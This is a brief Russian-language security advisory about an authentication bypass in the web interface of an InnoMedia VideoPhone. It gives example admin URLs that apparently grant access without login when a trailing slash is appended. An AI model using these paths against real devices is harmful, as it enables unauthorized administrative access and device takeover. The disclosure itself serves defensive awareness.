Программа: InnoMedia VideoPhone au75200xvi04010x 

Несколько уязвимостей обнаружено в Web интерфейсе InnoMedia VideoPhone. Удаленный пользователь может обойти авторизацию, чтобы получить доступ к административному интерфейсу.
Удаленный пользователь может получить доступ к некоторым административным сценариям без аутентификации, представляя слеш ‘/’ с URL: 

Пример: 

http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
ht tp://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/



Оставить мнение